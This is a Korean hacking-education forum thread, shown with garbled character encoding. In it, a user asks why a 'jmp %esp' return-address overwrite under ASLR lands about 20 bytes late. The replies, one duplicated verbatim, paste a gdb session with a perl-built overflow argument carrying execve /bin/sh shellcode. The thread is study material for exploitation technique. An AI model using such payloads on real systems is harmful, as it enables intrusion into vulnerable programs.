½Ã½ºÅÛ ÇØÅ·

 1574, 5/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   lMaxl04
   http://1111
   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2006 [º¹»ç]


32ºñÆ® ȯ°æÀÔ´Ï´Ù.

±âº»ÀûÀ¸·Î ½ºÅÃÀÇ ±¸Á¶°¡
buf
sfp
ret
À¸·Î ±¸¼ºµÇ¾îÀÖ°í

ÇÁ·Î±×·¥Àº
leave
ret
À¸·Î Á¾·áµÇ´Â °æ¿ì

¿©±â¼­ retÀ» jmp %espÀÇ ÁÖ¼Ò·Î »ç¿ëÇÏ¿´½À´Ï´Ù.

ÀÌ·ÐÀûÀ¸·Î leave¿¡¼­ mov %esp %ebp, pop %ebp
ret¿¡¼­ pop %eip, jmp %eip
°¡ µÇ¸ç,

º¯Á¶µÈ ½ºÅÃÀÇ ret ÁÖ¼Ò°¡ jmp %esp¸¦ ½ÇÇàÇϱ⠶§¹®¿¡
ret + 4ÀÇ Äڵ带 ¹Ù·Î ½ÇÇàÇÒ °ÍÀ¸·Î ¿¹»óÇÏ¿´´Âµ¥
½ÇÁ¦·Î´Â ret + 20 ¹ÙÀÌÆ® °¡·® µÚ¿¡ À§Ä¡Çؾ߸¸ ½ÇÇàÀÌ µÇ°í ÀÖ½À´Ï´Ù.

Ȥ½Ã ÃßÃøµÇ´Â »çÀ¯°¡ ÀÖÀ»±î¿ä?

  Hit : 1195     Date : 2022/06/29 06:05



    
cd80 ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù
¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù
(gdb) b *main+63
Breakpoint 1 at 0x80491f5
(gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

Breakpoint 1, 0x080491f5 in main ()
(gdb) si
0x0804a008 in ?? ()
(gdb) x/i $pc
=> 0x804a008: jmp *%esp
(gdb) i reg esp
esp 0xffffd3f0 0xffffd3f0
(gdb) si
0xffffd3f0 in ?? ()
(gdb) x/i $pc
=> 0xffffd3f0: push $0xb
(gdb)

½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥
x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä
½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù
2022/06/30  
lMaxl04 Áú¹®¿¡ ´ëÇÑ ¼³¸íÀÌ ºÎÁ·ÇÏÁø ¾Ê¾Ò³ª °ÆÁ¤Çߴµ¥ Àß ÀÌÇØÇØÁּż­ °¨»çÇÕ´Ï´Ù. Çϳª¾¿ ´Ù½Ã È®ÀÎÇغ¸°í½ÍÀºµ¥... ¾ÆÁ÷ ¸®¸ðÆ® ȯ°æ¿¡¼­ ÁÖ¼Ò¿Í °ª È®ÀÎÇÏ´Â ¹æ¹ýÀ» Àß ¸ô¶ó Á¶±Ý ´õ °í¹ÎÇغÁ¾ß°Ú½À´Ï´Ù ¤Ð¤Ð 2022/06/30  
somass ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù
¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù
(gdb) b *main+63
Breakpoint 1 at 0x80491f5
(gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

Breakpoint 1, 0x080491f5 in main ()
(gdb) si
0x0804a008 in ?? ()
(gdb) x/i $pc
=> 0x804a008: jmp *%esp
(gdb) i reg esp
esp 0xffffd3f0 0xffffd3f0
(gdb) si
0xffffd3f0 in ?? ()
(gdb) x/i $pc
=> 0xffffd3f0: push $0xb
(gdb)

½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥
x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä
½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù
2022/09/16  
1494   ÀÏ¹Ý À¥¼­¹ö°°Àº À©µµ¿ì¼­¹ö..[3]     ggh646
07/28 3978
1493   ÀÏ¹Ý PCÄÄÇ»ÅÍ ¿ø°Ý Á¢¼Ó ¹æ¹ýÁ»...[1]     ggew2000
05/22 5032
1492   ÀÏ¹Ý ÆÛ½º³Î ÄÄÇ»ÅÍ¿¡¼­ ´Ù¸¥ ÄÄÇ»ÅÍ·Î ÅÚ³Ý Á¢¼ÓÀÌ...[4]     jin1055
10/11 3737
1491   ÀϹÝÀûÀÎ ±Ã±Ý¿¡ ÀÇÇÑ Áú¹®ÀÔ´Ï´Ù^^[5]     PoS
08/10 3072
1490   ÀϹÝÀ¥»çÀÌÆ®¿¡¼­ ¼Ò½ºº¸±â¸¦ Çã¿ëÇÏ´Â ÀÌÀ¯°¡ ¹«¾ùÀԴϱî?[4]     Crucial
07/13 3211
1489   À̹ø¿¡ ¿î¿µÃ¼Á¦¿¡ ´ëÇØ °øºÎÇغ¸·Á Çϴµ¥¿ä... Áú¹®Çϳª¸¸ ÇÏ°Ú½À´Ï´Ù.[4]     boxlug
01/08 3035
1488   ÀÌ»óÇÑ ¾ÏÈ£¸ÞÀÏ??     as1as
05/22 4206
1487   angry_doraemon°°Àº ¹®Á¦ ·ÎÄõî·Ï..     vngkv123
04/22 2573
1486   ÀÔ¹®ÀÚÀε¥ droidjack , spynote Áú¹®     jwjw9900
12/19 3195
1485   API°ü·Ã ÇÔ¼ö Áú¹® ÀÔ´Ï´Ù.. [1]     BLu2Scr22n
02/05 3273
1484   arena ÀÇ ¶æ...     choboKing
08/09 3862
1483   argv[2]ÀÇ ÁÖ¼Ò¸¦ ¾Ë°í ½Í½À´Ï´Ù.[2]     ka0r1
09/23 2399
1482   argvºÎºÐ¿¡ ½©ÄÚµå ¿Ã¸®´Â Áú¹®ÀÔ´Ï´Ù.     aiurchar
11/01 4799
1481   arp¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù.[2]     junli
01/28 3350
1480   ascii armor °ü·Ã Áú¹®[1]     evernick
01/19 5436
1479 ºñ¹Ð±ÛÀÔ´Ï´Ù  asdad[6]     knightpop
12/07 855
1478   asis CTF ¹®Á¦Ç®´Ù°¡....[4]     vngkv123
04/12 2298
1477   aslr ȯ°æ¿¡¼­...[2]     vngkv123
04/12 2589
  ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1194
1475   Àú .. Á˼ÛÇѵ¥¿ä .. À̱ÛÁ» ²¿¿Á ºÁÁÖ¼¼¿ä .[4]     psd4d
02/21 3885
[1][2][3][4] 5 [6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org